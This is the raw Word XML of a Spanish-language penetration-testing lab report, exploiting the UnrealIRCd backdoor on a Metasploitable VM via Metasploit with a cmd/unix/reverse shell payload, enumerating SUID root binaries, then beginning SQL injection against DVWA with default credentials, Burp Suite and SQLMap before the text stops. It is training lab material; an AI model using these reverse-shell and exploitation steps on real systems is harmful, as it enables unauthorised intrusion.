          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRUEBAS DE EXPLOTACION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD30A19" w14:textId="0A3730A9" w:rsidR="008E6E82" w:rsidRDefault="008E6E82" w:rsidP="008E6E82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02527321" w14:textId="7C17BF50" w:rsidR="008E6E82" w:rsidRPr="001C5868" w:rsidRDefault="00B61292" w:rsidP="00B61292">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5868">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba de Penetración explotando la vulnerabilidad </w:t>
      </w:r>
      <w:r w:rsidRPr="001C5868">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- UnrealIRCd Backdoor Detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36136729" w14:textId="3F31380A" w:rsidR="00B61292" w:rsidRDefault="00B61292" w:rsidP="00B61292">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Para llevar </w:t>
      </w:r>
      <w:r w:rsidR="00143C34">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a cabo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dicha prueba utilizaremos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>y utilizaremos el comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00143C34">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para buscar el exploit que nos ayudara a realizar el ataque y lograr conectarnos con la maquina objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F9F30" w14:textId="09D4727A" w:rsidR="00143C34" w:rsidRDefault="00143C34" w:rsidP="00143C34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F8DEC11" wp14:editId="0A76E253">
            <wp:extent cx="5612130" cy="16579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57985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F85189" w14:textId="5A0DC50D" w:rsidR="00143C34" w:rsidRDefault="00143C34" w:rsidP="002724CB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Con show options podemos ver las opciones que hay que configurar las cuales son: RHOST, LHOST, PAYLOAD y llenamos con el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00143C34">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>set RHOST 192.168.2.102</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> (IP de la maquina objetivo) </w:t>
      </w:r>
      <w:r w:rsidR="002724CB">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST 192.168.2.123 (IP maquina local) y set payload cmd/unix/reverse, </w:t>
      </w:r>
      <w:r w:rsidR="002724CB">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">quedando configurado </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4D765D" w14:textId="5B109EBE" w:rsidR="002724CB" w:rsidRDefault="005B1E92" w:rsidP="00143C34">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27A6D317" wp14:editId="4A61D20C">
            <wp:extent cx="5612130" cy="17538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53870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EE41F3" w14:textId="77777777" w:rsidR="002724CB" w:rsidRDefault="002724CB" w:rsidP="002724CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1405"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C78B86A" w14:textId="3364C877" w:rsidR="002724CB" w:rsidRDefault="002724CB" w:rsidP="002724CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1405"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Y ahora solo toca ejecutar el exploit con el comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B581E" w14:textId="7D205D66" w:rsidR="002724CB" w:rsidRDefault="002724CB" w:rsidP="002724CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1405"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DABFE79" w14:textId="2A4E61DE" w:rsidR="002724CB" w:rsidRDefault="002724CB" w:rsidP="002724CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1405"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0D496F" w14:textId="44C6DB40" w:rsidR="002724CB" w:rsidRDefault="002724CB" w:rsidP="002724CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1405"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD5FB5F" w14:textId="42D178BC" w:rsidR="002724CB" w:rsidRDefault="005B1E92" w:rsidP="002724CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1405"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A0339B0" wp14:editId="37A96C11">
            <wp:extent cx="5612130" cy="20872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87245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7911A58D" w14:textId="386F8E3B" w:rsidR="005B1E92" w:rsidRDefault="005B1E92" w:rsidP="005B1E92">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB031B2" w14:textId="2520E50B" w:rsidR="005B1E92" w:rsidRDefault="005B1E92" w:rsidP="00A87A2C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Y tenemos acceso a la maquina metasplotaible, ahora colocaremos el comando Shell para tener </w:t>
      </w:r>
      <w:r w:rsidR="00A87A2C">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>un mejor control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la maquina objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD3B4E" w14:textId="4A6C12FC" w:rsidR="003742AD" w:rsidRDefault="003742AD" w:rsidP="003742AD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38424811" wp14:editId="31B6BC8C">
            <wp:extent cx="5612130" cy="27552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55265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F213C5E" w14:textId="16ACE809" w:rsidR="003742AD" w:rsidRDefault="003742AD" w:rsidP="003742AD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34DD155E" wp14:editId="46A2C2B4">
            <wp:extent cx="5612130" cy="13906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90650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="024E6A41" w14:textId="7E9F6090" w:rsidR="003742AD" w:rsidRDefault="003742AD" w:rsidP="003742AD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003742AD">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Con el comando find /* -user root -perm -4000 -print 2&gt; /dev/null Podemos obtener la información de que servicios son root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348799C" w14:textId="4E6E34E8" w:rsidR="003742AD" w:rsidRDefault="003742AD" w:rsidP="003742AD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F07CF3" w14:textId="4DF610F5" w:rsidR="003742AD" w:rsidRDefault="003742AD" w:rsidP="003742AD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B36D5EF" wp14:editId="7BF6DD69">
            <wp:extent cx="5612130" cy="43141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190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F56868" w14:textId="28B36315" w:rsidR="0049118C" w:rsidRPr="0049118C" w:rsidRDefault="0049118C" w:rsidP="0049118C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2439CA8B" w14:textId="0CC86CE0" w:rsidR="001C5868" w:rsidRPr="001C5868" w:rsidRDefault="001C5868" w:rsidP="001C5868">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5868">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba de Penetración </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">realizando inyección SQL a la </w:t>
      </w:r>
      <w:r w:rsidR="005D4C37">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>página</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585AA933" w14:textId="56BD22EB" w:rsidR="0049118C" w:rsidRDefault="001C5868" w:rsidP="001C5868">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5868">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Desde la maquina atacante accederemos desde el navegador web colocando la dirección de la maquina victima en nuestro caso 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>2.102</w:t>
      </w:r>
      <w:r w:rsidRPr="001C5868">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> obteniendo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F168D0" w14:textId="5814F6B3" w:rsidR="001C5868" w:rsidRDefault="001C5868" w:rsidP="001C5868">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EE218FF" wp14:editId="3690798B">
            <wp:extent cx="3415229" cy="246964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0987" cy="2473809"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37492757" w14:textId="6961A726" w:rsidR="001C5868" w:rsidRDefault="001C5868" w:rsidP="001C5868">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Utilizaremos DVWA para las pruebas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25691C4E" w14:textId="77777777" w:rsidR="001C5868" w:rsidRPr="00683AF7" w:rsidRDefault="001C5868" w:rsidP="001C5868">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00683AF7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Las credenciales por defecto son: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6FA7A3" w14:textId="77777777" w:rsidR="001C5868" w:rsidRPr="00683AF7" w:rsidRDefault="001C5868" w:rsidP="001C5868">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00683AF7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Usuario: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F071B" w14:textId="77777777" w:rsidR="001C5868" w:rsidRPr="00683AF7" w:rsidRDefault="001C5868" w:rsidP="001C5868">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00683AF7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Password: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62565789" w14:textId="3D1C1C44" w:rsidR="001C5868" w:rsidRDefault="001C5868" w:rsidP="001C5868">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7373E36B" wp14:editId="0573089C">
            <wp:extent cx="4114165" cy="3536414"/>
            <wp:effectExtent l="0" t="0" r="63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241"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4114286" cy="3536518"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7525C1" w14:textId="4BD240DD" w:rsidR="001C5868" w:rsidRDefault="001C5868" w:rsidP="00A97387">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Usaremos Foxy Proxy para trabajar con Burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00A97387">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> para</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A97387">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
        </w:rPr>
        <w:t>recopilar la información como las cookies dato que nos servirá al usar la herramienta SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0F490E" w14:textId="7F7D0938" w:rsidR="00A97387" w:rsidRDefault="00A97387" w:rsidP="00A97387">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="37B87248" wp14:editId="4223BC30">
            <wp:simplePos x="1079653" y="6268598"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3495238" cy="2171429"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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5238" cy="2171429"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="636C0BF3" w14:textId="77777777" w:rsidR="00A97387" w:rsidRDefault="00A97387" w:rsidP="00A97387">
      <w:pPr>
        <w:rPr>
